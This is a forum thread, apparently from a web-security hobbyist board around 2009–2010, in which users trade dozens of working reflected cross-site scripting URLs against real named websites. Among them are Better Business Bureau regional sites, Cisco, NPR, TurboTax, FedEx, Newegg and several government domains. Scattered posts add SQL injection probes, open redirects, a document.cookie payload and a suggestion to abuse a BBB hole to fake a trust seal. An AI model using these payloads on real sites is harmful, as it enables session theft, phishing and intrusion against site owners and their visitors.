I'm getting spammed with links to an Adobe XSS that looks like

connectusers.com/community/profile/whoever/

Nothing fancy involved, just raw HTML injected into profiles. Since it's being actively exploited I thought you guys would enjoy looking at it.

http://www.mangoblog.org/generic.cfm?q=%3Cscript%3Ealert%28%27Merry%20X-mas%20Sla.ckers%27%29%3C%2Fscript%3E&event=googlesearch-search
http://www.mangoblog.org/forums/messages.cfm?threadid=4C8CADF4-3048-2A53-70051D578C938A78

Particularly funny cause they know they're vulnerable, yet fail to see it as a threat.
Makes you wonder how vuln the CMS must be.



Edited 1 time(s). Last edit at 12/24/2009 07:35PM by lightos.

I lol'd


also
http://lista.vg.no/artist_info.php?msg=%3Cscript%3Ealert%281%29%3C/script%3E

http://www.dailycamera.com/portlet/article/html/fragments/email_article.jsp?article=14121857&hostName=%22><script>alert(1);</script>&section=%22><script>alert(1);</script>&siteId=%22><script>alert(1);</script>&&siteName=</textarea><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

http://www.cisco.com/cisco/web/psa/default/psasearch.html?q=%22><script>alert(1);</script>

that was too easy

http://finapps.forbes.com/finapps/jsp/finance/compinfo/CIAtAGlancelw.jsp?passName=CSCO%22><iframe%20src=http://google.com>

inside of a meta refresh was trying to break it

http://forms.theregister.co.uk/mail_the_reg/?user=johnl&message_subject=%22><script>alert(1);</script>

http://www.woc.noaa.gov/index.php?topic=<script>alert(1);</script>

http://landslides.usgs.gov/recent/index.php?year=%22></a><script>alert(1);</script>

http://adoption.state.gov/news/StarCountryData.php?country=<script>alert(1);</script>

http://www.arb.ca.gov/lispub/sublist.php?email=%22><img%20src=x%20onerror=alert(1);>

http://www.xssed.com/archive/author=PaPPy/



Edited 6 time(s). Last edit at 01/07/2010 09:37AM by PaPPy.

http://www.how2worktoys.com/productfigmd.php/%22%3E%3Cscript%3Ealert%28%27Hello%20world%27%29%3C/script%3E/?pid=84%27&pageNum_productmenu=0

http://activepaper.olivesoftware.com/Default/welcome.asp?skin=RegisterD&QS=%22><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

http://www.bbb.org/us/WWWRoot/Search.aspx?site=113&s=%22%22><script>alert(1);</script>

and maybe use the xss to draw you this page?
https://www.bbb.org/online/consumer/cks.aspx?id=105061317056
and place the image
and link it to your xss and ppl will trust ur site?

------------------------------------
http://abilene.bbb.org/WWWRoot/Search.aspx?site=38&s=%22%22><script>alert(1);</script>
http://alaskaoregonwesternwashington.bbb.org/WWWRoot/Search.aspx?site=114&s=%22%22><script>alert(1);</script>
http://austin.bbb.org/WWWRoot/Search.aspx?site=40&s=%22%22><script>alert(1);</script>
http://boston.bbb.org/WWWRoot/Search.aspx?site=27&s=%22%22><script>alert(1);</script>
http://calgary.bbb.org/WWWRoot/Search.aspx?site=154&s=%22%22><script>alert(1);</script>
http://cencal.bbb.org/WWWRoot/Search.aspx?site=25&s=%22%22><script>alert(1);</script>
http://centralalabama.bbb.org/WWWRoot/Search.aspx?site=43&s=%22%22><script>alert(1);</script>
http://centralflorida.bbb.org/WWWRoot/Search.aspx?site=172&s=%22%22><script>alert(1);</script>
http://centralgeorgia.bbb.org/WWWRoot/Search.aspx?site=61&s=%22%22><script>alert(1);</script>
http://centralohio.bbb.org/WWWRoot/Search.aspx?site=49&s=%22%22><script>alert(1);</script>
http://central-westernma.bbb.org/WWWRoot/Search.aspx?site=167&s=%22%22><script>alert(1);</script>
http://chattanooga.bbb.org/WWWRoot/Search.aspx?site=45&s=%22%22><script>alert(1);</script>
http://cleveland.bbb.org/WWWRoot/Search.aspx?site=78&s=%22%22><script>alert(1);</script>
http://columbia.bbb.org/WWWRoot/Search.aspx?site=48&s=%22%22><script>alert(1);</script>
http://concord.bbb.org/WWWRoot/Search.aspx?site=104&s=%22%22><script>alert(1);</script>
http://ct.bbb.org/WWWRoot/Search.aspx?site=29&s=%22%22><script>alert(1);</script>
http://dallas.bbb.org/WWWRoot/Search.aspx?s=%22%22><script>alert(1);</script>
http://dayton.bbb.org/WWWRoot/Search.aspx?site=51&s=%22%22><script>alert(1);</script>
http://easternnc.bbb.org/WWWRoot/Search.aspx?site=66&s=%22%22><script>alert(1);</script>
http://edmonton.bbb.org/WWWRoot/Search.aspx?site=155&s=%22%22><script>alert(1);</script>
http://goldengate.bbb.org/WWWRoot/Search.aspx?site=99&s=%22%22><script>alert(1);</script>
http://greatermd.bbb.org/WWWRoot/Search.aspx?site=41&s=%22%22><script>alert(1);</script>
http://greensboro.bbb.org/WWWRoot/Search.aspx?site=54&s=%22%22><script>alert(1);</script>
http://hawaii.bbb.org/WWWRoot/Search.aspx?site=55&s=%22%22><script>alert(1);</script>
http://houston.bbb.org/WWWRoot/Search.aspx?site=148&s=%22%22><script>alert(1);</script>
http://idahofalls.bbb.org/WWWRoot/Search.aspx?site=20&s=%22%22><script>alert(1);</script>
http://lakecharles.bbb.org/WWWRoot/Search.aspx?site=107&s=%22%22><script>alert(1);</script>
http://lima.bbb.org/WWWRoot/Search.aspx?site=82&s=%22%22><script>alert(1);</script>
http://louisville.bbb.org/WWWRoot/Search.aspx?site=23&s=%22%22><script>alert(1);</script>
http://maritimeprovinces.bbb.org/WWWRoot/Search.aspx?site=156&s=%22%22><script>alert(1);</script>
http://mbc.bbb.org/WWWRoot/Search.aspx?site=164&s=%22%22><script>alert(1);</script>
http://ms.bbb.org/WWWRoot/Search.aspx?site=173&s=%22%22><script>alert(1);</script>
http://nebraska.bbb.org/WWWRoot/Search.aspx?site=135&s=%22%22><script>alert(1);</script>
http://nepa.bbb.org/WWWRoot/Search.aspx?site=111&s=%22%22><script>alert(1);</script>
http://neworleans.bbb.org/WWWRoot/Search.aspx?site=171&s=%22%22><script>alert(1);</script>
http://reno.bbb.org/WWWRoot/Search.aspx?site=100&s=%22%22><script>alert(1);</script>
http://richmond.bbb.org/WWWRoot/Search.aspx?site=85&s=%22%22><script>alert(1);</script>
http://sandiego.bbb.org/WWWRoot/Search.aspx?site=26&s=%22%22><script>alert(1);</script>
http://sask.bbb.org/WWWRoot/Search.aspx?site=161&s=%22%22><script>alert(1);</script>
http://shreveport.bbb.org/WWWRoot/Search.aspx?site=69&s=%22%22><script>alert(1);</script>
http://southplains.bbb.org/WWWRoot/Search.aspx?site=60&s=%22%22><script>alert(1);</script>
http://spokane.bbb.org/WWWRoot/Search.aspx?site=70&s=%22%22><script>alert(1);</script>
http://spokane.bbb.org/WWWRoot/Search.aspx?site=70&s=%22%22><script>alert(1);</script>
http://topeka.bbb.org/WWWRoot/Search.aspx?site=88&s=%22%22><script>alert(1);</script>
http://tucson.bbb.org/WWWRoot/Search.aspx?site=72&s=%22%22><script>alert(1);</script>
http://upstateny.bbb.org/WWWRoot/Search.aspx?site=75&s=%22%22><script>alert(1);</script>
http://vawest.bbb.org/WWWRoot/Search.aspx?site=143&s=%22%22><script>alert(1);</script>
http://wichitafalls.bbb.org/WWWRoot/Search.aspx?site=94&s=%22%22><script>alert(1);</script>
http://wisconsin.bbb.org/WWWRoot/Search.aspx?site=28&s=%22%22><script>alert(1);</script>
http://wynco.bbb.org/WWWRoot/Search.aspx?site=98&s=%22%22><script>alert(1);</script>

even more sites here
http://g1.bbb.org/search?q=%22Check+Out+a+Business+or+Charity%22&btnG=Google+Search&access=p&entqr=0&ud=1&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=BBB_frontend&proxystylesheet=BBB_frontend&site=default_collection&start=0


possible sql injetion, or something? idk
http://akron.bbb.org/codbrep.html?wlcl=y&id=43000106%20or%201=1
Microsoft VBScript runtime error '800a01a8'

Object required: 'collCmplStats'

/V2FcnRelRep.asp, line 16


http://www.spamfighter.com/Search_Default.asp?submit=Search&q=test%22></a><script>alert('MacAfee%20secure%20my%20ass');</script>

http://www.quantixpos.com/php-bin/select_ticket_type.php?id_event_type=9&event_id=8944-R&event_name=%22><script>alert(1);</SCRIPT>&formatted_time=January 23, 2010, 09:00 AM

maybe sql injection?
http://www.quantixpos.com/php-bin/select_ticket_type.php?id_event_type=-1%20or%201=1

works only in ff?
http://www.macworld.com/search.html?q=%0atest</script><script>alert(1);%20//&sa=search&client=idg-cse&cof=FORID:11

http://www.npr.org/search/index.php?searchinput=</tilte>%22;</script><script>alert(1);</script><script>//

tax season anyone?
http://turbotax.intuit.com/support/asa/mainpage.jsp?topic=%22></a><script>alert(1);</script>

http://turbotax.intuit.com/support/search.jsp?_dyncharset=ISO-8859-1&pg=&bn_if=&q=%22><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/



Edited 7 time(s). Last edit at 01/25/2010 08:39PM by PaPPy.

http://www.discovercard.com/scripts/PageExit.htm?log=0&v_eurl=http://google.com
[www.discovercard.com]

http://www.saudigazette.com.sa/index.cfm?method=home.Error&msg=<script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 01/27/2010 02:07PM by PaPPy.

china's google?
http://goojje.com/s.php?hl=zh-CN&q=hp&q=</title>%22></a><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

http://javascript.about.com/gi/dynamic/offsite.htm?site=javascript:alert%28document.cookie%29;

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

digi7al64 Wrote:
-------------------------------------------------------
> http://javascript.about.com/gi/dynamic/offsite.htm
> ?site=javascript:alert%28document.cookie%29;
you missed one
[inventors.about.com]

http://www.xssed.com/archive/author=PaPPy/

this has problably been done before, but eh
http://h10025.www1.hp.com/ewfrf/wc/dexx?kickit=true&cc=us&lc=en&dlc=en&softwareitem=ob-47244-1&style=<script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/

Another news.com.au one - the error message they give you is the best... disallowed characters.... which are unescaped. fail

http://blogs.news.com.au/techblog/index.php/?moo%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E;%27

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

for the win
http://samples.msdn.microsoft.com/ietestcenter/frame_holder.htm?url=javascript:alert%28%27xss%27%29;

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://esupport.fcc.gov/askfccapp/extapp/submitMsg.action?dept_id=testing'%20style%3D'position%3Aabsolute%3Btop%3A-100px%3Bleft%3A-100px%3Bwidth%3A10000px%3Bheight%3A10000px%3Bz-index%3A999'%20onmouseover%3D'alert(1)%3B

for some reason i cant get this to work

http://www.xssed.com/archive/author=PaPPy/

PaPPy Wrote:
-------------------------------------------------------
> http://esupport.fcc.gov/askfccapp/extapp/submitMsg
> .action?dept_id=testing'%20style%3D'position%3Aabs
> olute%3Btop%3A-100px%3Bleft%3A-100px%3Bwidth%3A100
> 00px%3Bheight%3A10000px%3Bz-index%3A999'%20onmouse
> over%3D'alert(1)%3B
>
> for some reason i cant get this to work


Try adding display:block;

nvm

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 03/13/2010 02:15AM by digi7al64.

http://callcongressnow.com/index.cfm?action=<script>alert(1)</script>

just heard their annoying ass jingle on the tv
http://www.hotelplanner.com/index.cfm?City=%22><script>alert(1);</script>

as well as an open redirect
http://www.hotelplanner.com/FeaturedHotel.cfm?hid=92988&redirect=http://www.google.com

http://www.xssed.com/archive/author=PaPPy/

http://www.pcmag.com/products/?action=defaultadvancedquery&cid=1564&sid=1564&gridtitle=Recent%20Product%20Reviews%22%20onmouseover=%22alert(0%29%3B
http://www.pcmag.com/ad_links/0,,,00.asp?google_kw=';alert(0%29%3B%27

http://www.nydailynews.com/nydn/form/searchResults.jsp?q=%22></a><script>alert(1);</script>&Submit.x=0&Submit.y=0

http://www.nydailynews.com/blogs/nydn?search=%22></a><script>alert(1);</script>&blogs=all

http://www.nydailynews.com/forums/search.jspa?threadID=&objID=&userID=&dateRange=all&numResults=10&q=%22></a><script>alert(1);</script>

http://www.reuters.com/article/idUSTRE64433A20100505?type=%22><script>alert(1);</script>&feedType=RSS&feedName=testing

http://linktown.kens5.com/s/%22><img%20src=x%20onerror=alert(1)>/denver/co

http://www.xssed.com/archive/author=PaPPy/



Edited 3 time(s). Last edit at 05/05/2010 02:51PM by PaPPy.

NEWEGG!!! fuck yea!

http://www.newegg.com/Product/ProductList.aspx?Submit=DailyDeals&LayoutView=%22><img%20src=x%20onerror=alert(1);>

or into javascript

http://www.newegg.com/Product/ProductList.aspx?Submit=DailyDeals&bop=And&SrchInDesc=test&Page=1&LayoutView=list&PageSize=1%7D;%20alert(1);%20usingNamespace(%22Biz.ProductList%22%29%5B%22Config%22%5D=%7Bsomething:1

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 05/07/2010 08:57AM by PaPPy.

http://www.fedex.com/Tracking/Detail?ftc_start_url=&totalPieceNum=&backTo=&template_type=print&cntry_code=us&language=english&trackNum=870456747216&pieceNum=&selectedTimeZone=localScanTime%22;%20alert%281%29;%20//

https://www.innter.net/order.center/oConfirm.php?tan=%22><script>alert(1);</script>

http://www.myfoxny.com/search/SERP?search_type=site&top_search_field=%22><script>alert(1);</script>&sm=&srm=&startIndex=0&currentPage=1

http://find.t-mobile.com/controller?N=0&Ntk=primary&Ntx=mode+matchpartialmax&Ntt=</noscript><script>alert(1);</script><noscript>

http://www.telegraph.co.uk/search/?queryText=%22><img%20src=x%20onerror=alert(1);>&Search=Search

http://www.xssed.com/archive/author=PaPPy/



Edited 4 time(s). Last edit at 05/18/2010 12:01PM by PaPPy.

http://help.sohu.com/help_search.php?keyword=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%77%70%75%6c%6f%67%2f%29%3b%3c%2f%73%63%72%69%70%74%3e

http://zhidao.mail.163.com/zhidao/browse/search.do?type=1&state=2&reward=0&q=%22%3e%3Cscript/%3ealert(/wpulog/)%3c/script%3E

http://www.pulog.org

http://www.starbucks.com/search?keywords=%22%20style=%22position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999%22%20onmousemove=%22alert(1%29;

http://antares.stanford.edu/index.php/Site/Search?pagename=Site/Search&q=%22%20style=%27position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999%27%20onmousemove=%27alert(1%29;

http://crypto.stanford.edu/cs155old/cs155-spring09/proj3/sendmail.php?to=%22></a><script>alert(1);</script>

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 05/19/2010 02:15PM by PaPPy.

what about

http://www.arbornetworks.com/index.php?option=com_performs&formid=91&Itemid=821"><script>alert(String.fromCharCode(88,83,83))</script>

http://security-sh3ll.blogspot.com/

LIGATT Security http://www.ligattsecurity.com/about-us/ <- lol

http://www.ligattsecurity.com/?s="><script>alert('XSS')</script>

http://security-sh3ll.blogspot.com/

http://www.bp.com/search.do?cf=&gf=&tf=&nf=&bf=&re=false&pe=&de=false&rl=&cl=&nl=&bl=&ml=&lf=&ls=&lc=&ll=&lb=&cp=1&ra=&fl=n&kw=<iframe+onload%3Dalert(1)+src%3Dx&categoryId=1&sc=1

http://www.arco.com/search.do?cf=&gf=&tf=&nf=&bf=&re=&pe=&de=&rl=&cl=&nl=&bl=&ml=&lf=&ls=&lc=&ll=&lb=&cp=1&ra=&fl=&kw=%3Ciframe+onload%3Dalert%28%27BP%27%29+src%3Dx&categoryId=1&site=1

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 06/10/2010 11:28AM by PaPPy.

Someone passed this one to me and asked to have it posted here - not mine but still lovely.

http://preview.tinyurl.com/26y8tly